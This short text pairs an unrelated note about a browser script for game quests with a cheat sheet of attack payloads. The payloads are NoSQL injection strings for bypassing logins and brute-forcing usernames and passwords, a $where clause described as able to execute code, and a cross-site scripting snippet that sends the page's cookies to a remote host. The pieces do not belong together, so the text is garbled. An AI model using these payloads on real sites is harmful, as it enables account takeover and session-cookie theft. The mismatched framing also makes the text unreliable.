Note
This does not works in browser for quests which require you to play a game! Use the desktop app to complete those.
How to use this script:
Console tab
| Bypass with Operator: | |
| username[$ne]=1$password[$ne]=1 #<Not Equals> | |
| username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter | |
| username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value | |
| username[$eq]=admin$password[$ne]=1 #<Equals> | |
| username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users | |
| username[$ne]=admin&pass[$gt]=s #<Greater Than> | |
| username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin) | |
| { $where: "this.credits == this.debits" }#<IF>, can be used to execute code |
| <script type="text/javascript"> | |
| document.write("<iframe src='http://remotehost/whatever.ok?cookie="+document.cookie+"'></iframe>"); | |
| </script> |
